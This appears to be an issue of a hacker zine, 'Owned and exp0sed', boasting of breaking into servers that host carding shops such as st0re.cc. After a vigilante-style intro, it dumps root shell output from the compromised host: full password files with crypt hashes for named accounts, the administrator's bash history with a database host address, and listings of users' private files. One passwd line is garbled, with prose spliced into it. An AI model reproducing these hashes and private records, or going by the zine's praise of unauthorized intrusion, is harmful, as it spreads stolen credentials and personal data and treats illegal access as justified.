|\___/|
-=[ISSUE - NO 3]=- =) ^Y^ (=
-=[OF]=- \ ^ /
)=*=(
______________________________ __ ____________ _ / \
|.-----.--.--.--.-----.-----.--| | ___ ___ _| || | |
|| _ | | | | | -__| _ | | . | | . || /| | | |\
||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\
| | | ______ |__//_// ___/ __
| | | .-----.--.--.-----.| |.-----.--\_).--| ||
| | | | -__|_ _| _ || || ||__ --| -__| _ ||
| | | |_____|__.__| __|| || ||_____|_____|_____||
|_/ \__________________________|__|___| || |___________________|
|______|
Featuring... .---. /\ Brought to you by .---.
/ . \ / \ your Happy Ninjas / . \
|\_/| | | | |\_/| |
| | /| | b | | | /|
.-----------------------' | | a | .---------------------------' |
/ .-. | | c | / .-. |
| / \ Intro | | k | | / \ The Happy Ninja Faker |
| |\_. | St0re.cc | | | | |\_. | Swissfaking.net |
|\| | /| El-Basar.biz | | | |\| | /| Vpn24.org |
| `---' | | | o | | `---' | |
| |------------------' | n | | |----------------------'
\ | .---. | c | \ | .---.
\ / / . \ | e | \ / / . \
`---' |\_/| | | | `---' |\_/| |
| | /| | | | | /|
.-----------------------' | | a | .---------------------------' |
/ .-. | | g | / .-. |
| / \ Undercover.su | | a | | / \ Secure-Host.in |
| |\_. | k!LLu's Botnet | | i | | |\_. | Unique-Crew.net |
|\| | /| | | n | |\| | /| |
| `---' | | | | | `---' | |
| |------------------' | | | |----------------------'
\ | .---. | h | \ | .---.
\ / / . \ | e | \ / / . \
`---' |\_/| | | r | `---' |\_/| |
| | /| | e | | | /|
.-----------------------' | | | .---------------------------' |
/ .-. | | | / .-. |
| / \ Zion-Network.net | | t | | / \ Some leftovers |
| |\_. | Hackbase.cc | | o | | |\_. | Outro |
|\| | /| | | | |\| | /| |
| `---' | | | | | `---' | |
| |------------------' | r | | |----------------------'
\ | | m | \ |
\ / | | \ /
`---' | /\ | `---'
:\______|/ \|______/:
\__0day______0day__/
| /\ |
|| ||
|| ||
|| ||
|| ||
| \/ |
\____/
(____)
First of all, here is the verification of the sha1 hash we published
when hba-crew got owned: 49bd4433fff1b04530dcaff1f52fa971ff895871 =
sha1(HAPPY_NINJAS_ARE_STAYING_HAPPY_exp03)
,;~;,
/\_
( /
(() //)
| \\ ,,;;'\
__ _( )m=((((((((((((((========={ Intro }=========-------
/' ' '()/~' '.(, |
,;( )|| | ~ Tonight's the night. And it's going to happen,
,;' \ /-(.;, ) again and again. It has to happen.
) / ) /
// || We all want to welcome you to a brand new issue
)_\ )_\ of Owned and exp0sed! Before we get to the fun
part, we'd just like to clarify some things since there has been a lot
going on on the internet since our last issue.
Movements, as they put it, like Anonymous or the short-lived
phenomenon of Lulzsec have gotten an increasingly important topic to
media and the public. We want to line out our motivation in contrast
to theirs. Anonymous has tried to gain as much media attention as
possible by inflicting the most damage possible on big companies and
service providers. Similarily, Lulzsec have attacked various websites
and published an enormous amount of information.
However, while it's their goal to put up pressure on governments and
big organizations, it's ours to protect the public from the abysses of
the internet. Fraud is our main concern and we intent to contain it as
much as possible. While Anon and Lulzsec toss out their stuff within
weeks, we take our time to gain access, collect data and aggregate it
nicely for you, our readers. This is why there is a substantial
time span between our releases.
We of course also monitor the German and international fraud scene as
it recovers from our attacks; it's hard to stop something that is
driven by selfishness, greed and money. We also find it worrying that
Anonymous and especially Lulzsec act in what they call "Operation
Antisec". The original Antisec Movement was brought to life by actual
hackers and targeted full disclosure and the corporate security
industry. Publishing gigantic amounts of (corporate) data on the
internet does exactly the opposite: It provides the security industry
with the attention they need and hence new customers.
But let's now look at why we are here today. "Money is the root of all
evil" as the proverb has it; and it's why fraud communities do come
back after we have owned and exposed them; but as long as they carry
on, we do, too. Fraudsters ought to know that they're not safe because
we are going to hunt down every single site that is left. We
experience the fraud scene scattering wider and wider after every
issue we have published; new boards, and with them new admins, emerge
out of nowhere. That just shows well again how stubborn fraudsters are
as most of them still refuse to accept that they lost their right to
exist on the internet. It's particularly frustrating that they don't
seem to draw lessons from getting owned again and again.
That being said we can just strongly advise you to spend your time on
something worthwhile. It's not too late ...
,;~;,
_/\
\ )
(\\ ())
/';;,, // |
-------========={ St0re.cc }==========))))))))))))))=m( )_ __
| ,(.' '~/()' ' '\
Let's head to our first target. Fraud or scene ~ | ||( );,
shops in general have not been our main concern. ( ,;.)-\ / ';,
During our many break-ins in other fraud \ ( \ (
communities, we often were dazzled with glaring || \\
banners of underground markets where you could buy /_( /_(
"fresh" CCs, PayPal accounts or socks5 proxies to stay "secure" while
carding. So by now we got the hint that it might be worth finding out
out how often and by whom these shops were really used. It's quite
impressive how much money you can make by simply stealing PayPal
accounts with a RAT and not using it for fraud but for selling it to
scammers instead. That's why we clicked on the first banner we saw and
concluded that it would be a noble action to root. We actually got
pretty lucky since st0re.cc was not the only credit card store on that
server. We spotted some others like the infamous El-Basar.biz (it was
already shown in a German tv show), the rest is not worth to mention.
Anyway this is what you get if you decide to buy credit cards in a
webshop: You will get owned and exposed. Like always.
# uname -a
FreeBSD 6.4-RELEASE-p11 i386 i386 SMP-GENERIC
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
# cat /etc/passwd
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/usr/local/bin/bash
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
cyrus:*:60:60:the cyrus mail server:/nonexistent:/usr/sbin/nologin
nukeuploads:*:1001:1001:User &:/home/nukeuploads:/bin/sh
ayoga:*:1002:1002:User &:/home/ayoga:/sbin/nologin
alg:*:1004:1004:User &:/home/alg:/bin/sh
propiska:*:1005:1005:User &:/home/propiska:/sbin/nologin
msk:*:1007:1007:User &:/home/msk:/sbin/nologin
vestacomp:*:1006:1006:User &:/home/vestacomp:/sbin/nologin
crank2010:*:1016:1016:User &:/home/crank2010:/sbin/nologin
lordknight:*:1019:1019:User &:/home/lordknight:/bin/sh
madrage:*:1003:1003:User &:/home/madrage:/bin/sh
scenehack:*:1008:1008:User &:/home/scenehack:/sbin/nologin
thefuelru:*:1009:1009:User &:/home/thefuelru:/sbin/nologin
mr101:*:1021:1021:User &:/home/mr101:/bin/sh
szenevz:*:1011:1011:User &:/home/szenevz:/sbin/nologin
exchanger:*:1012:1012:User &:/home/exchanger:/bin/sh
filip:*:1023:1023:User &:/home/filip:/sbin/nologin
mmgen:*:1018:1018:User &:/home/mmgen:/sbin/nologin
ganymedes:*:1024:1024:User &:/home/ganymedes:/sbin/nologin
garf:*:1031:1031:User &:/home/garf:/sbin/nologin
onlineschauen:*:1013:1013:User &:/home/onlineschauen:/bin/sh
snetwork:*:1022:1022:User &:/home/snetwork:/sbin/nologin
useresu:*:1010:1010:User &:/home/useresu:/sbin/nologin
useresu1:*:1026:1026:User &:/home/useresu1:/sbin/nologin
margosha:*:1020:1020:User &:/home/margosha:/sbin/nologin
pavlrse:*:1027:1027:User &:/home/pavlrse:/sbin/nologin
muraaat:*:1000:1000:User &:/home/muraaat:/sbin/nologin
test4me:*:1014:1014:User &:/home/test4me:/bin/sh
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0::0:0:Charlie &:/root:/usr/local/bin/bash
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
cyrus:*:60:60::1172782800:0:the cyrus mail server:/nonexistent:/usr/sbin/nologin
nukeuploads:$1$hO28fqpU$OL/RovJhduUxEqR3kBawe.:1001:1001::0:0:User &:/home/nukeuploads:/bin/sh
ayoga:$1$CNCuqfrs$p7QpuHI6jagkVUyvGO5MI.:1002:1002::0:0:User &:/home/ayoga:/sbin/nologin
alg:$1$A07..akS$.TPW7o0ZCO25bB6AltS/Q.:1004:1004::0:0:User &:/home/alg:/bin/sh
propiska:$1$Hgb0peXw$2wtRLXytI9Mmwbsxi/RAI.:1005:1005::0:0:User &:/home/propiska:/sbin/nologin
msk:$1$yqxdalvS$IPYorMt8h.pMqc3V8mdED0:1007:1007::0:0:User &:/home/msk:/sbin/nologin
vestacomp:$1$bL6RZJ2K$f7CTWRj.ps2Q9XuImy4sI1:1006:1006::0:0:User &:/home/vestacomp:/sbin/nologin
crank2010:*:1016:1016::0:0:User &:/home/crank2010:/sbin/nologin
lordknight:*:1019:1019::0:0:User &:/home/lordknight:/binbreak-ins in other fraud/sh
madrage:*:1003:1003::0:0:User &:/home/madrage:/bin/sh
scenehack:*:1008:1008::0:0:User &:/home/scenehack:/sbin/nologin
thefuelru:*:1009:1009::0:0:User &:/home/thefuelru:/sbin/nologin
mr101:*:1021:1021::0:0:User &:/home/mr101:/bin/sh
szenevz:*:1011:1011::0:0:User &:/home/szenevz:/sbin/nologin
exchanger:*:1012:1012::0:0:User &:/home/exchanger:/bin/sh
filip:$1$asb5GyOE$OHPPapNFMf6zKA5FvrIpE/:1023:1023::0:0:User &:/home/filip:/sbin/nologin
mmgen:$1$bnXQT0ng$obWjcBQFTBTKk83ElXfDt0:1018:1018::0:0:User &:/home/mmgen:/sbin/nologin
ganymedes:$1$95EongK1$fFPWI1ePR8VKBIAQ/LwUu0:1024:1024::0:0:User &:/home/ganymedes:/sbin/nologin
garf:$1$xzEPVuNH$26jps1eOPu2hNObvlcgkH0:1031:1031::0:0:User &:/home/garf:/sbin/nologin
onlineschauen:$1$RihNUTco$hzbht5CwvI/h3X0cGe8T91:1013:1013::0:0:User &:/home/onlineschauen:/bin/sh
snetwork:$1$y0T7yJX4$ER.mYpG3P21qlz3qgQWtN.:1022:1022::0:0:User &:/home/snetwork:/sbin/nologin
useresu:$1$6J5xPk5F$sfpn5pAKTlf10hX3kSKkv.:1010:1010::0:0:User &:/home/useresu:/sbin/nologin
useresu1:$1$gPsMDoWO$.Ve9Z8tEQLZrlF7MrP6ZH1:1026:1026::0:0:User &:/home/useresu1:/sbin/nologin
margosha:*:1020:1020::0:0:User &:/home/margosha:/sbin/nologin
pavlrse:$1$AKfcvELm$oImAlQWKKDaEd.dimM6wY/:1027:1027::0:0:User &:/home/pavlrse:/sbin/nologin
muraaat:*:1000:1000::0:0:User &:/home/muraaat:/sbin/nologin
test4me:$1$nNH.D3yA$2KQeYLwqG3TcFHOc9toFL0:1014:1014::0:0:User &:/home/test4me:/bin/sh
# pwd
/root
# ls -la
total 715748
drwxr-xr-x 4 root wheel 512 Sep 9 04:43 .
drwx--x--x 18 root wheel 512 Apr 12 19:59 ..
-rw------- 1 root wheel 10017 Sep 26 02:59 .bash_history
-rw------- 1 root wheel 67 Sep 9 17:00 .cvspass
-rw------- 1 root wheel 50 Feb 9 2011 .lesshst
drwxr-xr-x 3 root wheel 512 Sep 26 02:57 .mc
-rw------- 1 root wheel 1344 May 20 03:24 .mysql_history
drwx------ 2 root wheel 512 Aug 14 19:22 .ssh
-rwxr-xr-x 1 root wheel 241 Jul 21 00:11 addban.sh
-rw-r--r-- 1 root wheel 601437 Apr 12 17:56 apache.log
-rwxr-xr-x 1 root wheel 89 Mar 6 2010 apache_watchdog.php
-rwxr-xr-x 1 root wheel 4184 Feb 2 2011 mydumpsplitter.sh
-rwxr-xr-x 1 alg www 365607550 Feb 1 2011 zzz.sql
# cat .bash_history
apachectl restart
exit
tail -f /var/log/httpd/httpd_access.log
tail -f /var/log/httpd/httpd_access.log
/usr/local/etc/rc.d/apache22 restart
top -S
tail -f /var/log/httpd/httpd_access.log
/usr/local/etc/rc.d/apache22 restart
/usr/local/etc/rc.d/apache22 restart
/usr/local/etc/rc.d/apache22 restart
cd /home/alg/
mc
mysql -u root -p`cat /etc/my.passwd `
cd db_split/
mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < postindex.sql
ls -la
mcedit postindex.sql
mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < adminlog.sql
mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < attachment.sql
top
cd ..
wget
wget http://platon.sk/cvs/cvs.php/___checkout___/scripts/perl/mysql/mysqldump-convert.pl?rev=1.5&content-type=text/plain mysqldump-convert.pl
mc
ls
mcedit mysqldump-convert.pl\?rev\=1.5
mc
cat db_split/postindex.sql | ./mysqldump-convert.pl > postindex.sql
mcedti postindex.sql
mcedit postindex.sql
mcedit mysqldump-convert.pl
mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < postindex.sql
exit
mc
/usr/local/etc/rc.d/apache22 restart
top
mc
date
exit
mc
cd /home/nukeuploads/nukeuploads.com/
chown nukeuploads:nukeuploads google4973efd9f5db5c16.html
mc
apachectl restart
uptime
top
tail -n 1000 /var/log/httpd/httpd_access.log
ps aux | grep nginx
mc
exit
apachectl stop
uptime
uptime
uptime
uptime
uptime
top
apachectl start
exit
tail -n 1000 /var/log/httpd/httpd_access.log
exit
top
apachectl restart
top
tail -n 1000 /var/log/httpd/httpd_access.log
tail -n 1000 /var/log/httpd/httpd_access.log
exit
apachectl restart
top
exit
tail -f /var/log/httpd/httpd_access.log
apachectl stop
killall -9 httpd
apachectl start
tail -f /var/log/httpd/httpd_access.log
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
mc -d
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
top
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
ps ax|grep -c http
top
top
uptime
uptime
uptime
uptime
uptime
uptime
top
cd /home/kirbysho/
mc
uptime
uptime
uptime
mcedit /usr/local/etc/apache22/vhosts/kirbysho.conf
apachectl restart
top
mc
mcedit /usr/local/etc/apache22/vhosts/kirbysho.conf
apachectl restart
uptime
uptime
uptime
uptime
uptime
uptime
top
tail -n 100 /var/log/httpd/httpd_access.log
uptime
uptime
uptime
uptime
top
exit
apachectl restart
exit
tail -f /var/log/httpd/httpd_access.log
killall -9 httpd
apachectl restart
top
tail -f /var/log/httpd/httpd_access.log
tail -f /var/log/httpd/httpd_access.log
tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru
mc -d
date
date
date
date
date
date
date
date
killall -9 httpd
apachectl start
tail -f /var/log/httpd/httpd_access.log
tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru
tail -n 10000 /var/log/httpd/httpd_access.log | grep "russian-elite" > /root/apache.log
mc
killall -9 httpd
apachectl start
top
tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru
killall -9 httpd
apachectl start
tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru
cat /var/log/httpd/httpd_access.log | grep kirby-shop.ru > /var/log/httpd_kirby.log
cat /var/log/httpd/httpd_access.log
cat/var/log/httpd_kirby.log
cp /var/log/httpd_kirby.log
cp /var/log/httpd_kirby.log /home/kirbysho/
ls /home/kirbysho/
exit
tail -f /var/log/httpd/httpd_access.log
tail -f /var/log/httpd/httpd_access.log
top
top
ps ax
tail -f /var/log//httpd/httpd_access.log
tail -f /var/log//httpd/httpd_access.log
ps ax
top
ls -l
ping ya.ru
ping google.com
exit
mc
tail -f /var/log/httpd/httpd_access.log
mc
mc
mysql -unukeuploads_gla -p -h db.nukeuploads.com nukeuploads_gla
mysql -unukeuploads_gla -p -h
mysql -unukeuploads_gla -p -h
mysql -unukeuploads_gla -p -h 92.241.164.71 nukeuploads_gla
mc
nslookup
mc
nslookup
tail -n 1000 /var/log/httpd/httpd_access.log
exit
tail -n 1000 /var/log/httpd/httpd_access.log
top
exit
tail -f /var/log/httpd/httpd_access.log
tail -f /var/log/httpd/httpd_access.log
tail -f /var/log/httpd/httpd_access.log
tail -n 1000 /var/log/httpd/httpd_access.log
exit
tail -n 100 /var/log/httpd/httpd_access.log
tail -n 100 /var/log/httpd/httpd_access.log | grep russian | wc -l
exit
tail -f /var/log/httpd/httpd_access.log
touch ~/addban.sh
chmod +x ~/addban.sh
mcedit ~/addban.sh
tail -n 100 /world/sec1005/var/log/httpd/httpd_access.log | grep 'swissfaking.net' | awk '{print }' | sort | uniq -c | sort -n | awk '{if ($1>3) print $2}'
/usr/local/etc/rc.d/apache22 restart
/usr/local/etc/rc.d/apache22 restart
tail -f /var/log/httpd/httpd_access.log
tail -f /var/log/httpd/httpd_access.log
/usr/local/etc/rc.d/nginx status
tail -f /var/log/httpd/httpd_access.log
tail -f /var/log/httpd/httpd_access.log
tail -f /var/log/httpd/httpd_access.log
tcpdump -nn host 187.160.244.66
tcpdump -nni bge0 host 187.160.244.66
tcpdump -nni bge0 host 187.160.244.66
sort /var/log/httpd/httpd_load.log | awk '{print $1}' | uniq -c
mc
mc -d
php -V
php -v
mysql -v
mysql -V
top
mc
ls -la
cd /home/margosha/
ls -la
pwd
mc
killall -9 mc
ls -la
cd forum.la2amadis.ru/
ls -la
cd ..
ls -la
chown -cRv margosha:www ./*
chown -cRv margosha:www ./*
chown -cR margosha:www ./*
chown -R margosha:www ./*
ls -la
cd forum.la2amadis.ru/
ls -la
cd ..
ls -la
cd la2amadis.ru/
ls -la
mc
ps ax
w
ps axu
ps axu
tail -f /var/log/httpd/httpd_access.log
exit
ps wauxf
cat /proc/22623/cmdline
kill -9 22623
ps wauxf
df -h
cd /home/toco123/
ls -la
cd 00/
ls -la
mc
killall -9 mc
ps wauxf
df -h
ls /tmp
ls -la
ls -la /tmp/
ps wauxf
df -h
w
cd /
ls -la
cat /etc/fsta
ps wauxf
kill -9 22623
cd /tmp/
ls -la
rm a.*
ls -la
tail -f /var/log/httpd/httpd_access.log
w
ps wauxf
ifconfig
cd /home/
ls -la
mc
cd /home/margosha/
tar czfv backup.tgz forum.la2amadis.ru la2amadis.ru
mc
chown margosha:www backup.tgz
mc
php -v
cd /usr/ports/mail/php-imap
cd /usr/ports/
cd ./mail
ls |grep imap
cd php5-imap
make install clean
cd /usr/local/etc/
ls
mc
mc
cd /usr/ports/mail/php52-imap
make install clean
cd /usr/ports/mail/php5-imap
make install clean
portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5
cd /usr/ports/mail/php52-imap
portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5
cd /usr/ports/ports-mgmt/portdowngrade
make install clean
make install clean
cd /usr/ports/mail/php5-imap
portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5
cd /usr/ports/mail/php5-imap
portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5
php -m
whereis portdowngrade
cd /usr/ports/ports-mgmt/portdowngrade
make install clean
cd /usr/ports/devel/popt
make install clean
cd /usr/ports/devel/libtool22
make install clean
cd -
make install clean
uname -a
php -v
cd /usr/ports/lang/php52-extensions/
make config
make
cd ../php5-extensions/
make config
make
php -v
portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5
touch /root/.cvspass
portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5
php -v
portdowngrade -s :pserver:anoncvs@anoncvs.fi.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.fi.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 -o anoncvs
portdowngrade -o anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -o=anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -o anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5
server_args = -f --allow-root=/test pserver
cat /etc/inetd.conf
cat /etc/inetd.conf | grep allow
portdowngrade -s :pserver:anoncvs@cvsup13.tw.freebsd.org:/home/ncvs lang/php5
portdowngrade -s :pserver:cvsup13.tw.freebsd.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@cvsup13.fr.freebsd.org:/home/ncvs lang/php5
mc
php -v | grep imap
php -m | grep imap
portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs2.FreeBSD.org:/home/ncvs lang/php5
php -v
portdowngrade lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncv lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -r -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :login:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5
portdowngrade -s ":pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs" lang/php5
portdowngrade -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5
portdowngrade -o -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5
portdowngrade -o -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5
cd /usr/ports/mail/php5-imap/
make config
make
cd ..
cd ..
mc
cd distfiles/
fetch http://downloads.php.net/ilia/php-5.2.5.tar.bz2
cd ..
cd mail/php5-imap/
make
make install
php -m
php -m | grep imap
ls /var/db/pkg/| grep extre
ls /var/db/pkg/| grep exte
ls
mc
# cd /home/mmgen
total 44
drwxr-x--- 7 mmgen www 512 Jun 11 13:18 .
drwx--x--x 28 root wheel 1024 Sep 14 17:31 ..
drwxrwx--- 5 mmgen www 512 Jun 11 15:22 dodo.st0re.cc
drwxrwx--- 8 mmgen www 1024 Sep 30 16:19 st0re.cc
drwxrwx--- 3 mmgen www 512 Jan 26 2011 st0re.mmgen.st0re
drwxrwx--- 4 mmgen www 512 Dec 2 2010 st0re.morgen.w2c.ru
drwxrwx--- 2 mmgen www 10240 Oct 1 16:32 temp
# cd dodo.st0re.cc
# ls -la
total 96
drwxrwx--- 5 mmgen www 512 Jun 11 15:22 .
drwxr-x--- 7 mmgen www 512 Jun 11 13:18 ..
drwxr-xr-x 2 mmgen www 512 Jun 11 15:21 css
drwxr-xr-x 4 mmgen www 2048 Jun 11 15:23 images
-rw-r--r-- 1 mmgen www 38106 Jun 11 15:23 index.html
drwxr-xr-x 2 mmgen www 512 Jun 11 15:21 js
# cd ..
# cd st0re.mmgen.st0re
# ls -la
total 16
drwxrwx--- 3 mmgen www 512 Jan 26 2011 .
drwxr-x--- 7 mmgen www 512 Jun 11 13:18 ..
drwxr-xr-x 4 mmgen www 1536 Jan 26 2011 Neues Verzeichnis
-rw-r--r-- 1 mmgen www 1034 Dec 2 2010 index.html
# cd "Neues Verzeichnis"
# ls -la
total 237856
drwxr-xr-x 4 mmgen www 1536 Jan 26 2011 .
drwxrwx--- 3 mmgen www 512 Jan 26 2011 ..
-rw-r--r-- 1 mmgen www 12326 Jan 26 2011 2.pl
-rw-r--r-- 1 mmgen www 3790 Jan 26 2011 2.png
-rw-r--r-- 1 mmgen www 697711 Jan 26 2011 22.png
-rw-r--r-- 1 mmgen www 164 Jan 26 2011 280539654158.kwm
-rw-r--r-- 1 mmgen www 1608 Jan 26 2011 280539654158.pwm
-rw-r--r-- 1 mmgen www 40882 Jan 26 2011 4.jpg
-rw-r--r-- 1 mmgen www 40505 Jan 26 2011 Banner4.jpg
-rw-r--r-- 1 mmgen www 1280 Jan 26 2011 Command Prompt.lnk
-rw-r--r-- 1 mmgen www 231 Jan 26 2011 Data.txt
-rw-r--r-- 1 mmgen www 900 Jan 26 2011 Daten.rtf
-rw-r--r-- 1 mmgen www 661429 Jan 26 2011 Enterpage.png
-rw-r--r-- 1 mmgen www 126738 Jan 26 2011 Enterpage_for_gamekings_eu_by_Frizzl3.jpg
-rw-r--r-- 1 mmgen www 1616155 Jan 26 2011 FILE0009.rar
-rw-r--r-- 1 mmgen www 952 Jan 26 2011 Fake Webcam (No Preview Mode).lnk
-rw-r--r-- 1 mmgen www 942 Jan 26 2011 Fake Webcam.lnk
-rw-r--r-- 1 mmgen www 1950 Jan 26 2011 FileZilla Client.lnk
-rw-r--r-- 1 mmgen www 1192 Jan 26 2011 Foxit Reader.lnk
-rw-r--r-- 1 mmgen www 10374720 Jan 26 2011 MasterCard-Abrechnung.psd
-rw-r--r-- 1 mmgen www 1889 Jan 26 2011 Mozilla Firefox.lnk
-rw-r--r-- 1 mmgen www 22207 Jan 26 2011 Neues Textdokument.txt
-rw-r--r-- 1 mmgen www 137 Jan 26 2011 PSN2.txt
drwxr-xr-x 2 mmgen www 512 Jan 26 2011 Pack_Pixel_Arrows_01
drwxr-xr-x 2 mmgen www 512 Jan 26 2011 Packstation
-rw-r--r-- 1 mmgen www 38207488 Jan 26 2011 PhotoshopCS4Portable.rar
-rw-r--r-- 1 mmgen www 1139 Jan 26 2011 SQLRIP.lnk
-rw-r--r-- 1 mmgen www 1884 Jan 26 2011 SendBlaster.lnk
-rw-r--r-- 1 mmgen www 2505 Jan 26 2011 Skype.lnk
-rw-r--r-- 1 mmgen www 318050 Jan 26 2011 St0re.jpg
-rw-r--r-- 1 mmgen www 4574766 Jan 26 2011 St0re.psd
-rw-r--r-- 1 mmgen www 679964 Jan 26 2011 St0re2.jpg
